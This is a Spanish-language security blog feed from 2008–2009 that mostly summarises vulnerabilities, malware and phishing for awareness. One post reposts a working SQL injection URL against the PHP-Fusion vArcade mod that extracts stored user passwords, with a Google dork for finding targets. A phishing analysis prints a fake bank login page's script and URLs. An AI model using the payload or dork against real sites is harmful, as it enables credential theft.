tag:blogger.com,1999:blog-74908175706521803122024-03-06T03:00:22.062-03:00Security HackSitio personal de Ariel M. Liguori De GottigAriel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-7490817570652180312.post-11211451407089526882009-11-04T20:05:00.000-03:002009-11-04T20:05:43.384-03:00Seminario: "The Explosion of the Axis of Evil".-Disculpen la demora en comentar esta data, pero el día de mañana (2009-11-05) a las 02:00PM EST especialistas de MANDIANT y Virus Total darán una conferencia acerca de las estadisticas del malware enfocandose principalmente en dos aspectos, bastantes divergentes, uno es el analisis de los ataques masivos y otro enfocado a los ataques que tienen un objetivo más claro y definido.<br />
<br />
El link para que se registren lo pueden hallar <span id="goog_1257375403763"></span><a href="https://cc.readytalk.com/cc/schedule/display.do?udc=dncxz4u5wfkm">aquí</a><br />
<br />
<i>Referencias:</i><br />
<a href="http://www.mandiant.com/">Página Oficial de Mandiant.</a><br />
<a href="http://www.virustotal.com/es/">Pagina Oficial de Virus Total.</a><br />
<br />
Fuente: <a href="http://www.hispasec.com/directorio/laboratorio/ultimasunaaldia">unaaldia - Hispasec</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-91521383800824759672009-01-23T11:31:00.006-02:002009-01-23T14:52:11.088-02:00Clickjacking: Cuidado dende Clickeas!Jeremiah Grossman y Robert Hansen hacé tiempo han delatado la presencia de éste nuevo tipo de...¿ataque? pues sí. <br /><br />¿Qué es el ClickJacking?<br />Si bien el nombre es intuitivo me limitaré a decir que es una técnica utilizada para disfrazar vínculos, ¿qué significa esto? simple, en una determinada pagina un link a google puede dejar de ser lo que parece y redirigirte a otros sites, e inclusive puede redirigirte al _'mismo'_sitio_alterado_(ataques de pishing a la vista), en síntesis una vez que simplemente clickeas puedes ser el culpable del fin de tu ordenador/datos/etc.<br /><br />¿Como prevenirlo o detectarlo?<br />Realmente no estoy al tanto de métodos directos de detección/evitación de este tipo de ataques, tengo entendido que el addon de Firefox NoScript puede ser de ayuda, no obstante prefiero tener cuidado y mirar bien donde clickeo (Not with my eyes, of course).<br /><br />Datos de interes:<br /><a href="http://www.sectheory.com/clickjacking.htm">SecTheory</a><br /><a href="http://www.kriptopolis.org/clickjacking">Kriptopolis</a><br /><a href="http://www.securityartwork.es/2009/01/23/ofuscacion-de-la-barra-de-estado-en-firefox-305-clickjacking-poc/">Security Art Work</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-89476876516438308142009-01-14T10:14:00.002-02:002009-01-14T10:34:56.257-02:00Análisis de Malware.-Por la web, realmente no recuerdo donde, me he encontrado con el link a este documento en donde nos introducen en una suerte de FAQ sobre Malware y, sobre todo, en el análisis del mismo.<br /><br /><a href="http://docs.google.com/View?docid=ddkp262g_4ftzh5mhg">Análisis de Malware</a><br /><br />Enjoy it!<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-55676407740753583512009-01-10T22:30:00.000-02:002009-01-10T22:30:00.788-02:00Felices Fiestas... ¿Para quién?Algo que era de esperarse, las fiestas no llegaron solas (no hombre, nadie les ha traído regalos, o al menos ese tipo de regalos) s no quieren creerme pégenle una mirada a <a href="http://www.pcworldenespanol.com/pcwla2.nsf/articulos/EF6E11D0DF7C694C8525753500123F3A">ésta nota</a> de <a href="http://www.pcworldenespanol.com/">PC World</a>.<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-13256423836264036602009-01-09T23:45:00.000-02:002009-01-09T23:45:04.994-02:00ojo! No subestimes los XSS!Debido al post que publique recientemente, me he sentido preocupado al decir lo ineficaz que pueden resultar los XSS. Ésto me hizo recordar un post de <a href="http://blog.s21sec.com/">s21sec</a> en donde claramente nos decían que no se debe subestimar los XSS, <span style="font-style:italic;">¿porque?</span> Mírenlo <a href="http://blog.s21sec.com/2008/06/no-subestimes-tus-cross-site-scriptings.html">aquí</a> y entiendan mejor las cosas ;).<br /><br />Algo a destacar es que los XSS son las vulnerabilidades más comunes en páginas web. Algo preocupante y que además llama la atención ya que es relativamente sencillo solucionar este tipo de problemas.<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-39408046739333852822009-01-09T14:13:00.002-02:002009-01-09T14:17:16.687-02:00XSS - Cross Site ScriptingHoy he vuelto a desenterrar este tema, ya por mi olvidado debido a su limitado e ineficaz uso (igualmente, siempre hay alguien a quien podremos hacer caer ¬¬ ). Sin embargo, vengo aquí solo para mostrarles un par de documentos con buena información referente al tema:<br /><br /><a href="http://www.cis.upenn.edu/~cis551/XSS.pdf">XSS - Cross Site Scripting Explained (PDF en inglés).</a><br /><a href="http://www.soulblack.com.ar/repo/papers/minituto-xss.pdf">Cross Site Scripting - By Soulblack (PDF en Español).</a><br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-53144241804018752172009-01-09T09:09:00.002-02:002009-01-09T10:00:54.643-02:00Sql Injection Vulnerability en PHP-Fusion.Usar con cuidado y con fines educativos solamente :)<br /><br />----------------------------------------------------------------<br />Script : PHP-Fusion Mod vArcade 1.8<br />Type : Sql Injection Vulnerability<br />Risk : <span style="font-weight: bold; color: rgb(255, 0, 0);">High</span><br />----------------------------------------------------------------<br />Download From : <a href="http://venue.nu/">http://venue.nu/</a><br />----------------------------------------------------------------<br />Discovered by : Khashayar Fereidani<br />My Official Website : <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />Our Team Website : <a href="http://ircrash.com/">http://IRCRASH.COM</a><br />Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com<br /><br />----------------------------------------------------------------<br />Sql Injection Vulnerability :<br /><br />Vulnerable address : <span style="font-weight: bold;">http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*</span><br /><br /><span style="font-weight: bold; font-style: italic;">Google Dark : inurl:/infusions/varcade/</span><br />----------------------------------------------------------------<br /> Tnx : God<br /><a href="http://ircrash.com/"> http://IRCRASH.COM</a> <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />----------------------------------------------------------------Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-40249995663360586112008-12-30T08:21:00.010-02:002008-12-30T10:36:49.495-02:00Análisis de Phishing en Standard Bank (30/12/2008).-Hoy por la mañana he recibido un curioso correo de Standard Bank SA:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s1600-h/ej_pishing01.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s320/ej_pishing01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5285526660184946994" /></a><br /><br />Todo parece muy correcto, sin embargo, nadie se cree que Standard Bank necesite verificar nuestros datos. Al margen de eso, el link que aparece en el email es el correcto de Standard Bank aunque si se fijan en detalle esos links nos llevaran a otras URL's, no a las que tienen configuradas, dichas páginas son:<br /><br />http://standardbank.com.ar.webempresas.idkey26914511442100136208.secupends8.cn/ar_pers/ (para personas)<br /><br />http://standardbank.com.ar.webempresas.idkey2323415925205188159167.secupends8.cn/ar_corp/ (para empresas)<br /><br />Hemos encontrado algo interesante, estos no parecen los sitios de Standard Bank, veamos si encontramos en ellos algo interesante (explorando un poquito el código fuente):<br /><pre><code>var dummy = false;<br />var procesando = false;<br /><br /> function SetCookie (name, value) {<br /> expireDate = new Date;<br /> expireDate.setDate(expireDate.getDate()+10);<br /> document.cookie = name + '=' + value + ';expires=' + expireDate.toGMTString();<br /> }<br /><br /> function GetCookie (name) {<br /> var arg = name + "=";<br /> var alen = arg.length;<br /> var clen = document.cookie.length;<br /> var i = 0;<br /> while (i < clen) {<br /> var j = i + alen;<br /> if (document.cookie.substring(i, j) == arg)<br /> return getCookieVal (j);<br /> i = document.cookie.indexOf(" ", i) + 1;<br /> if (i == 0) break;<br /> }<br /> return null;<br /> }<br /><br /> function getCookieVal(offset) {<br /> var endstr = document.cookie.indexOf (";", offset);<br /> if (endstr == -1)<br /> endstr = document.cookie.length;<br /> return unescape(document.cookie.substring(offset, endstr));<br /> }<br /><br /><br /> function validateLogin (frmForm) {<br /> var strInput;<br /> var strError = '';<br /> var blnSucess = false;<br /> var strValidos = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';<br /><br /> with (frmForm) {<br /> //Valido nombre de usuario<br /> strInput = usuario.value;<br /> if (strInput.length < 1) {<br /> strError += 'Debe ingresar el nombre de usuario.\n';<br /> } else if (strInput.length < 8 || strInput.length > 12) {<br /> strError += 'El nombre de usuario debe tener ente 8 y 12 caracteres.\n';<br /> }<br /> else<br /> {<br /> strIngr = strInput.split("");<br /> for(j=0; (j<strIngr.length); j++)<br /> {<br /> if (strValidos.indexOf(strIngr[j])==-1)<br /> {<br /> strError += 'Debe ingresar sólo números o letras';<br /> break;<br /> }<br /> }<br /> }<br /> //Valido clave<br /> strInput = password.value;<br /> if (strInput.length < 1)<br /> {<br /> strError += 'Debe ingresar una clave de acceso.\n';<br /> }<br /> else if (strInput.length < 8 || strInput.length > 8)<br /> {<br /> strError += 'La clave de acceso debe tener 8 caracteres.\n';<br /> }<br /> else<br /> {<br /> strIngr = strInput.split("");<br /> for(j=0; (j<strIngr.length); j++)<br /> {<br /> if (strValidos.indexOf(strIngr[j])==-1)<br /> {<br /> strError += 'Debe ingresar sólo números o letras';<br /> break;<br /> }<br /> }<br /> }<br /> }<br /><br /> if (strError) {<br /> alert (strError);<br /> blnSucess = false;<br /> } else {<br /><br /> blnSucess = true;<br /><br /> if ( dummy == false )<br /> {<br /> dummy = true;<br /> }<br /> else<br /> {<br /> alert ('Aguarde, su transaccion esta siendo procesada . . .');<br /> blnSucess = false;<br /> }<br /> }<br /> return blnSucess;<br /> }<br /><br />function validaNavegador()<br />{<br /> var valida = false;<br /> if(navigator.appName=="Netscape")<br /> {<br /> if(parseFloat(navigator.appVersion) >= 4.75)<br /> {<br /> // version correcta 4.75<br /> valida = true;<br /> }<br /> //return;<br /> }<br /> else<br /> {<br /> var version = new String(navigator.appVersion);<br /> var i = version.indexOf("MSIE ");<br /> if(i >= 0)<br /> {<br /> var fVersion = parseFloat(version.substring(i + 5))<br /> if(fVersion >= 5.5) // version correcta 5.5<br /> valida = true;<br /> //return;<br /> }<br /> }<br /> if(!valida)<br /> {<br /><br /> }<br /> else<br /> {<br /> document.frmLogin.usuario.focus();<br /> }<br />}<br /><br />function load()<br />{<br /> // document.frmLogin.usuario.focus();<br /> validaNavegador();<br />}<br /><br />function KBgo(check, link)<br />{<br /> if (check.checked == true)<br /> {<br /> this.location.href="https://www.standardbank.com.ar:443/cgi-bin/preprd.dll/bkb/access.do?" + link + "&kb=s";<br /> }<br />}<br /></code></pre>Bueno, esto habla por si solo, espera a que ingresemos nuestro user y pass, los obtiene y luego nos redirecciona a la pagina real de Standard Bank, todo típico en un ataque de Phishing, es el modus operandi que se encuentra en cualquier libro. Tengan cuidado y fijense bien adonde entran, las diferencias entre las páginas es nula.<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-18520145702511971862008-12-25T01:00:00.000-02:002008-12-26T09:47:01.170-02:00Feliz Navidad y ojo con DNSChanger!Feliz Navidad!!!<br /><br />Y como regalito de Papá Noel les cuento que el viejo Malware DNSChanger ha evolucionado un poquito, ahora además de redirigir nuestros DNS a los suyos (que suelen encontrarse en la red UkrTeleGroup) nos instalan un DHCP Server para que de este modo propaguemos todos los datos a las máquinas que están conectadas en nuestra LAN. Muchas víctimas al precio de una.<br />Para los que no comprenden lo peligroso que puede ser el cambio de un DNS les recomiendo pegarle una ojeada al tema de pishing (más que interesante ;) ).<br /><br />SaludosAriel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-37013396569886676292008-12-16T09:37:00.000-02:002008-12-16T10:44:11.310-02:002008 Malware Challenge!Si alguna vez paso por sus cabezas la pregunta <span style="font-style: italic;">¿Cuanto saben de Malware?</span> sepan que ya existe el lugar donde pueden demostrar (a ustedes y al mundo) ese conocimiento, sí <span style="font-weight: bold;">Malware Challenge 2008</span> se encargará de cubrir sus expectativas.<br /><br />En este caso se les presenta a los contendientes un archivo infectado y ellos a partir de éste deben indicar (copio textual de la página):<br /><ul style="font-style: italic;"><li>Describe your malware lab.<br /> <br /> </li><li>What information can you gather about the malware without executing it?<br /> <br /> </li><li>Is the malware packed? If so, how did you determine what it was?<br /> <br /> </li><li>Describe the malware's behavior. What files does it drop? What registry keys does it create and/or modify? What network connections does it create? How does it auto-start, etc?<br /> <br /> </li><li>What type of command and control server does the malware use? Describe the server and interface this malware uses as well as the domains and URLs accessed by the malware.<br /> <br /> </li><li>What commands are present within the malware and what do they do? If possible, take control of the malware and run some of these commands, documenting how you did it.<br /> <br /> </li><li>How would you classify this malware? Why?<br /> <br /> </li><li>What do you think the purpose of this malware is?</li></ul> <p style="font-style: italic;">Bonus questions: (These questions are not required to be answered but could be used to break a tie for prizes.)</p> <ul style="font-style: italic;"><li>Is it possible to find the malware's source code? If so, how did you do it?<br /> <br /> </li><li>How would you write a custom detection and removal tool to determine if the malware is present on the system and remove it?</li></ul>Un excelente trabajo fue realizado por Emre Bastuz:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtfLwT1qyu66yzZ9cm98kC9q15LIyIELXyaBQHSkQCixc1ymsejKtgqs_nZRrGULLlxcy4LD9A5gdIQi9fFy8_aX5kqV3zUwXKwb8wnZyxUTKSsR1JQvQkj2QbPi9nPyccvdlkaIK0BM/s320/pdfIcon.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 47px; height: 49px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtfLwT1qyu66yzZ9cm98kC9q15LIyIELXyaBQHSkQCixc1ymsejKtgqs_nZRrGULLlxcy4LD9A5gdIQi9fFy8_aX5kqV3zUwXKwb8wnZyxUTKSsR1JQvQkj2QbPi9nPyccvdlkaIK0BM/s320/pdfIcon.jpg" alt="" border="0" /></a><br /><a href="http://www.malwarechallenge.info/results/bastuz.pdf">Descargar informa aquí</a><br /><br /><br />Pueden encontrar más informes <a href="http://www.malwarechallenge.info/results.html">acá.</a><br /><br /><span style="font-style: italic;">PS:</span> La respuesta a la consigna uno nos lleva a <a href="http://sechack.blogspot.com/2008/12/vm-una-herramienta-para-el-anlisis.html">algo que ya vimos</a> ;)<br /><span style="font-style: italic;">PS2:</span> A pesar del hermoso y detallado trabajo que observamos Emre no gano nada por residir fuera de EEUU.<br /><br />Link oficial: http://www.malwarechallenge.info<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-27789349634570010612008-12-11T08:20:00.000-02:002008-12-11T08:21:30.519-02:00PDF, ¿Portable Document Format ó Poisoned Document Format?<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKj3tT18J0rCXI4Mel5NU70A3aYZsDi1UbxHxNKoTmdkcKGW0AdW5fXMTS8hHW0ZGuERHVKtEP5_sv3hsLPJg9J0fcJi7ZdzmBAw0crqvioT8nhEu3x0es7e4zjPbd7ZsZIFhPcwxCdc/s1600-h/pdf+lupa.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 171px; height: 214px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKj3tT18J0rCXI4Mel5NU70A3aYZsDi1UbxHxNKoTmdkcKGW0AdW5fXMTS8hHW0ZGuERHVKtEP5_sv3hsLPJg9J0fcJi7ZdzmBAw0crqvioT8nhEu3x0es7e4zjPbd7ZsZIFhPcwxCdc/s320/pdf+lupa.jpg" alt="" id="BLOGGER_PHOTO_ID_5278138303576159106" border="0" /></a><br /><br /><br /><br />Los archivos PDF circulan hoy en día por la red con la naturalidad que los años y sus beneficios le han asignado. Los PDF's han logrado abrirse lugar entre los diversos formatos de archivos gracias a sus ventajas (que no pienso detallar, try google), y es por ello que al haber alcanzado a un grupo masivo de usuarios se convierten en el foco de posibles amenazas.<br /><br /><br /><br />¿Por que?<br />Simple, el aprovechar este tipo de archivos para realizar cualquier tipo de acción sobre otros usuarios se puede replicar por millones (ya aclaré que el uso del PDF es _MASIVO_).<br /><br />Esto que cuento, obviamente no se me ocurrió a mi, sino a varias personas hace mucho tiempo y es así que hoy en día los PDF pueden resultar una amenaza para nuestra PC.<br /><br />¿Como es que un PDF puede hacernos daño?<br />Básicamente lo que se realiza es la inyección de código malicioso dentro de un archivo, por ejemplo, dentro de un ebook en formato pdf podemos añadir código js que se ejecute luego de abrir el archivo. Imagínense si dicho ebook es alojado en rapidshare/megaupload/x el alcance que tendrá.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://didierstevens.files.wordpress.com/2008/11/20081110-202238.png?w=660&h=240"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 660px; height: 240px;" src="http://didierstevens.files.wordpress.com/2008/11/20081110-202238.png?w=660&h=240" alt="" border="0" /></a><br /><br />¿Que daño se busca hacer?<br />Todo ataque tiene una finalidad, difícilmente hoy en día se observe a alguna persona que intente desarrollar troyanos o detectar vulnerabilidades sin un beneficio detrás. En el caso de los PDF generalmente se trata de:<br /><ul><li>Pishing</li><li>SPAM</li><li>Robo de información.</li></ul>¿Como lo detecto?<br />En principio, la idea es evitar abrir emails con PDF's de fuentes poco confiables, sin embargo es posible que haya muchos archivos ya infectados en la red. Para evitar ser víctima de ellos lo ideal es utilizar algún scanner de pdf, tener el AV actualizado (aunque con las técnicas de ofuscación que se realizan difícilmente detecten algo) y ,lo más importante, ser consciente del riesgo que corremos.<br /><br />Por hoy no voy a continuar sobre el tema ya que es posible que genere un papper bastante completo con toda esta info, seguramente eso lo aprovecharán más.<br /><br />Les dejo algunas herramientas para que trabajen:<br /><a href="http://www.didierstevens.com/files/software/pdf-parser_V0_2_0.zip">PDF-Parser v0.20</a><br /><a href="http://www.didierstevens.com/files/software/make-pdf_V0_1_0.zip">make-PDF v0.10</a> (Cuidado con este ;) )<br /><br />Algunos links muy interesantes:<br /><a href="http://www.arnnet.com.au/index.php/id;1709463464">Tecnicas para el ocultamiento de malware en PDFs</a><br /><a href="http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/">Didier Stevens Blog: Introduccion a la deteccion de malware en PDFs</a><br /><a href="http://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/">Didier Stevens Blog: Estructura de un archivo PDF</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-33538400281678894092008-11-26T15:30:00.002-02:002008-11-26T15:40:46.592-02:00Shellcoders - WTF ¿?Seguramente muchos conozcan el término, pero realmente que es un Shellcode.<br /><a href="http://es.wikipedia.org/wiki/Shellcode">Wikipedia</a>, como siempre tiene una respuesta, y es básicamente correcta. Un Shellcode es una seria _pequeña_ de instrucciones codificadas al mayoría de las veces íntegramente en código ASM que buscan la ejecución de shell mediante, por ej., el resultado de un buffer overflow (hablaremos de esto luego, lo debo aún).<br />Esto que aquí se enuncia puede parecer muy sencillo y básico y es por ello que resulta tan peligroso y explorado por tantos usuarios.<br />¿Para que nos sirve un Shellcode? o ¿Para que armaríamos uno?<br /><span id="fullpost"><br />Difícilmente querremos realizar esta labor para ejecutar un simple "/bin/sh" sino que gracias a la posibilidad de explotar diferentes recursos de la PC con estos códigos querremos hacer _algo_más_ que solo nosotros sabremos que es (y que puede ser lo que se nos de la gana ;) ). En este punto es donde el riesgo entra en juego, se pueden realizar códigos que utilicen las vulnerabilidades de diversos sistemas/aplicaciones para producir un buffer overflow (p. ej) y ejecutar de este modo código arbitrario. Eso es malo y es peor aún lo sencillo que es aprender a dominar este conocimiento con práctica.<br /><br />Para que se vayan entrenando: <br /><a href="http://shellcode.org/Shellcode/">Shellcode.org</a><br />Y lo que lo trajo a mi memoria <a href="http://vlan7.blogspot.com/2008/11/postit-smallest-gnulinux-x86.html">acá</a>.<br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-88106713085126542822008-11-24T09:19:00.006-02:002008-11-24T10:17:14.808-02:00¿WPA y WPA2 inseguros? No confundamos las cosas.El pasado 10 de noviembre, dos investigadores alemanes (Erik Tews y Martin Beck) alegaron haber saltado las restricciones de WPA. Sus intentos fueron ciertos y es por ello que comenzó el debate nuevamente sobre la seguridad en las WLANs.<br />WPA/WPA2 es un sistema de protección que se aplica a redes wireless, surgió como mejora a WEP el cual era y es inseguro.<br />Al definir a WPA como sistema hay que tener en cuenta que por ello los métodos de seguridad que emplee están fuera de él, es decir WPA/WPA2 puede utilizar diversos algoritmos para garantizar la seguridad de los datos.<br />Es hora de preguntarnos ¿Se quebranto al seguridad en el sistema que creíamos más seguro en la actualidad?<br />No, solamente se encontró la forma de deshacerse de las restricciones que se obtienen con la incorporación de protección WPA/WPA2 con TKIP.<br /><span id="fullpost"><br />TKIP es, como su nombre lo indica, un protocolo de integridad de clave temporal. Suele utilizarse en la mayoria de las redes wireless protegidas con WPA. La falla que se hallo vulnera directamente el metodo que utiliza TKIP para la encripcion de paquetes. Entra en juego ahora otro cuestionamiento más ¿Cual es la profundidad de este ataque?<br />En principio lo que este tipo de ataques permite es la desencripcion de algunos pquetes en la red y la posibilidad de hacer injection. Este ataque no permite la recuperacion de la contraseña y esta limitado a una pequeña cantidad de paquetes a injectar.<br /><br />Sin embargo este descubrimiento a alertado a todos los especialistas del area y diversas herramientas estan readapatandose para explotar al maximo la nueva vulnerabilidad. El ataque chopchop en principio ya podría ser utilizado.<br /><br />¿Que acciones tomar?<br />Simple, migrar a WPA2 con cifrado AES.<br /><br />Links de interes:<br /><ul><li><a href="http://www.aircrack-ng.org/doku.php?id=links&DokuWiki=84ec69e7cec475fb1dcba0b225a0a444#technique_papers">Aircrack pappers </a></li><li><a href="http://dl.aircrack-ng.org/breakingwepandwpa.pdf">Breaking WEP and WPA</a></li><li><a href="http://www.netstumbler.org/f50/chopchop-experimental-wep-attacks-12489/">ChopChop Attack</a><br /></li></ul></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-42477821440223091022008-07-01T11:35:00.004-03:002008-07-01T11:50:24.769-03:00Blogger AttackSegún un informe elaborado por StopBadware.org, el servicio de blogs de Google figura entre los primeros lugares de la lista de compañías con sitios web desde los que se propaga malware.<br />Google no ha salido a reponder las acusaciones y continúa con su politica de seguridad desde adentro intentando subsanar todo el mal al que ellos le abrieron la puerta.<br />El servicio de Blogs de google es ampliamente utilizado por la mayoria de los usuarios de la web, las facilidades que brinda son numerosas y la ventaja de ser gratuito induce a millones de usuarios a registrarse diariamente.<br /><span id="fullpost"><br />Sin embargo, el control que hace sobre sus blogs parece ser muy precario ya que hace unos años Google ni figuraba como un productor de malware desde si mismo y hoy en dia esta dentro del top 10 de sitios peligrosos. El inminente surgimiento de blogs promoviendo el malware y su desarrollo es cada vez mayor, además se encuentran no solo blogs, sino paginas hospedadas y listas de correo google especializadas en estás áreas. Un tema muy importante, una critica fuerte y una respuesta que aún no ha llegado.<br /><br />Por el momento, a tener cuidado con los sitios de blogger a los que accedemos.<br /><br />Fuente: PC World y The Register. <br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-61713275271656528872008-06-24T11:12:00.005-03:002008-06-24T11:24:01.474-03:00DoS en IPS Cisco.-Según informa Cisco Systems, el problema esta fundado en el manejo de los conocidos "Jumbo Frames" los cuales son tramas de un elevado tamaño cuyo MTU puede llegar a los 10Kb. El problema residiría en aquellos dispositivos que posean puertos gigabit en modo "inline", y el efecto que puede llegar a causar es el de un Kernel Panic ante el recebimiento de tramas Jumbos especialmente manipuladas lo cual finalizaría en un DoS.<br /><span id="fullpost"><br />Los productos afectados serían:<br /><pre><code>Cisco Intrusion Prevention System version 5.x <br />prior to 5.1(8)E2<br /><br />Cisco Intrusion Prevention System version 6.x <br />prior to 6.0(5)E2<br /><br />Y los siguientes equipos si poseen puertos de red <br />gigabit en modo "inline":<br /><br />4235<br />4240<br />4250<br />4250SX *<br />4250TX<br />4250XL *<br />4255<br />4260<br />4270</code></pre><br />La vulnerabilidad se ha documentado bajo el Cisco Bug ID CSCso64762.<br /><br />Más información:<br /><a href="http://www.cisco.com/en/US/products/products_security_advisory09186a00809b3842.shtml">Cisco Fixes and Countermeasures</a><br /><a href="http://www.cisco.com/warp/public/707/cisco-sa-20080618-ips.shtml">Cisco Security Advisory</a> <br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-45443321008236524472008-06-24T10:55:00.003-03:002008-06-24T11:10:15.425-03:00Llegó temprano: Vulnerabilidad en Firefox 3.0El mismo dia que se dio inicio a la descarga mundial de Mozilla Firefox 3.0, ZDI (Zero Day Initiative) reportó a las 5 horas del lanzamiento una vulnerabilidad crítica en FF3, se informa que dicho fallo puede permitir la ejecución de código arbitrario y el mismo sería iniciado al visitar ciertos sitios especialmente manipulados. Aún no hay novedades de Firefox al respecto.<br /><br />También circula por diversas listas especializadas en programacion y vulnerabilidades el hallazgo de otras dos vulnerabilidades pero los detalles técnicos de estás y el impacto alcanzado no han sido comunicados.<br /><br />Mas información en:<br /><a href="http://dvlabs.tippingpoint.com/blog/2008/06/18/vulnerability-in-mozilla-firefox-30">Tipping Point (ZDI)</a><br /><a href="http://www.securityfocus.com/bid/29794/info">Mozilla Firefox 3 Unspecified Buffer Overflow Vulnerability</a><br /><a href="http://seclists.org/fulldisclosure/2008/Jun/0228.html">Flaw in Firefox 3.0: protocol-handler.warn-external are ignored</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-38855578888548891562008-06-24T10:16:00.003-03:002008-06-24T10:45:31.265-03:00Vulnerabilidad en Cisco & SNMPv3.-Bueno, recientemente he leido de una vulnerabilidad que ha sido detectada en la mayoria de los equipos Cisco, la misma afecta a aquellos que poseen SNMPv3 configurado y en uso. Según se informa por los fabricantes el problema se encontraria en los metodos de autenticacion ejercidos por el dispositivo.<br /><span id="fullpost"><br />Si un atacante podria aprovechar esta falencia en los procesos de autenticación HMAC-MD5-96 y HMAC-SHA-96 para revelar informacion sensible de la red y vulnerar los dispositivos alterando su configuración.<br /><br />Los equipos afectados serían:<br /><br /><pre><code>Cisco IOS<br />Cisco IOS-XR<br />Cisco Catalyst Operating System (CatOS)<br />Cisco NX-OS<br />Cisco Application Control Engine (ACE) Module<br />Cisco ACE Appliance<br />Cisco ACE XML Gateway<br />Cisco MDS 9000 Series Multilayer Fabric Switches<br />Cisco Wireless LAN Controller (WLC)</code></pre><br /><br />Para más información acerca de contramedidas y fixes para esta vulnerabilidad pueden consultar: <a href="http://www.cisco.com/en/US/products/products_security_advisory09186a00809ac83b.shtml"> Cisco fixes and Countermeasures</a><br /> <br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-61885438002082988242008-06-11T14:55:00.002-03:002008-06-11T15:02:52.057-03:00Nueva variante de GpCode.Les hago público algo que llego a mis manos en estos días (ayer para ser más precisos).<br />Una nueva variante del ya conocido GpCode estaría realizando ataques de ransomware tomando como base para la encriptación de nuestros archivos el algoritmo de clave publica RSA con 1024 bits. <br />Si bien varias empresas ya están alertadas de esto, la utilizacion de este algoritmo complica la posibilidad de romper la clave de nuestros ficheros por lo cual las distintas empresas de AV están tratando de enfocar la solución al problema desde otro punto de vista.<br /><br />Más información en: <a href="http://www.diarioti.com/gate/n.php?id=17946">Diario TI</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com1